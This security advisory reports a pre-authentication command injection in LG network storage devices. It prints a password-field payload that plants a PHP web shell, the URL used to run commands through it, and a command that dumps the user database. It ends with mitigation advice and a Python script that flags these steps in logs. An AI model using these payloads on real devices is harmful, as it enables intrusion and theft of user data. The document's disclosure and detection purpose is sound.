RCE in LG Network Storage Devices

A flaw has been discovered in LG Network Attached Storage devices that allows attackers to execute code remotely and steal data from the device without authentication.

A pre-authentication remote command injection vulnerability exists that can allow an attacker to perform virtually any operation on the device, including accessing sensitive data and tampering with user data and content. Attackers can then upload and distribute malware across the network using this storage device.

The LG Network Attached Storage (NAS) device is a dedicated file storage unit, connected to a network, that allows users to store and share data with multiple computers.  Authorized users can access their data remotely both within the network and over the Internet.[1]

The command injection vulnerability results from improper input validation of the "password" parameter on the login page. This allows remote attackers to pass commands through the password field.

First, we write a PHP shell by entering this command in the password field:

; echo “<?php echo \”<pre>\”; system(\$_GET[‘p’]); echo \”</pre>\”;?>” >/tmp/x2;sudo mv /tmp/x2/var/www/payload.php

 

We can now pass the commands and execute them using:

http://ip_address:8000/payload.php?p=command_to_execute

 

We can now use various payloads, e.g.

Payload to read the user database:

echo “.dump user” | sqlite3 /etc/nas/db/share.db

Once the shell is in place, attackers can run any command. Using this shell, attackers can easily execute more commands, one of which will highly likely allow them to download the complete database of NAS devices, including users' emails, usernames and MD5-hashed passwords. Since passwords protected with the MD5 cryptographic hash function can easily be cracked, attackers can gain authorized access and steal a user's sensitive data stored on the vulnerable devices.

An exploitation video has also been created. It can be viewed at: https://www.youtube.com/watch?v=7RgCq5d13qk

Prevention and Mitigation Strategies

Since LG has not yet released a fix for the issue, our members are advised to ensure that their devices are not accessible via the public Internet and are protected behind a firewall configured to allow only a trusted set of IPs to connect to the web interface. Wapack Labs and members alike should remain vigilant for firmware upgrades and patches.
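
Until a patch is available, logs in front of the device can be checked for the two stages described above. The following is an added example, not part of the original advisory or of LG's code: it flags shell syntax in the login form's "password" field and successful requests to PHP files that are not part of a known-good web root. It assumes a reverse proxy or WAF that records login bodies and writes common-format access logs; the baseline file names, the "user" field name and the sample data are hypothetical.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Assumption: PHP pages shipped in the web root; build the real list from a
# known-good firmware image. These two names are hypothetical.
BASELINE = {"/index.php", "/login.php"}

# Shell separators, pipes, substitution and redirection characters.
SHELL_META = re.compile(r"[;|&`<>]|\$\(")

# Common/combined log format: client, request line, status code.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')

def suspicious_password(form_body):
    """True if the urlencoded login body has shell syntax in 'password'."""
    fields = parse_qs(form_body, keep_blank_values=True)
    return any(SHELL_META.search(v) for v in fields.get("password", []))

def unknown_script_hits(log_lines, baseline=BASELINE):
    """(client, path, query) for 200 responses from PHP files not in baseline."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        client, _method, target, status = m.groups()
        url = urlsplit(target)
        if status == "200" and url.path.endswith(".php") and url.path not in baseline:
            hits.append((client, url.path, url.query))
    return hits

# Constructed sample data, not captured from a real device.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:01 +0000] "POST /login.php HTTP/1.1" 200 512',
    '198.51.100.7 - - [01/Jan/2024:10:02:13 +0000] "GET /payload.php?p=command_to_execute HTTP/1.1" 200 64',
    '198.51.100.7 - - [01/Jan/2024:10:02:20 +0000] "GET /missing.php HTTP/1.1" 404 0',
]
SAMPLE_BODIES = ["user=admin&password=Summer2018", "user=admin&password=x%3B+echo+test"]

if __name__ == "__main__":
    for body in SAMPLE_BODIES:
        print(suspicious_password(body), body)
    for hit in unknown_script_hits(SAMPLE_LOG):
        print("unknown PHP script served:", hit)
```

A legitimate password can contain these characters, so treat a password hit as a triage signal and correlate it with an unknown-script hit from the same client.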

 

[1] http://www.lg.com/uk/network-storage/lg-N2B1D-network-attached-storage
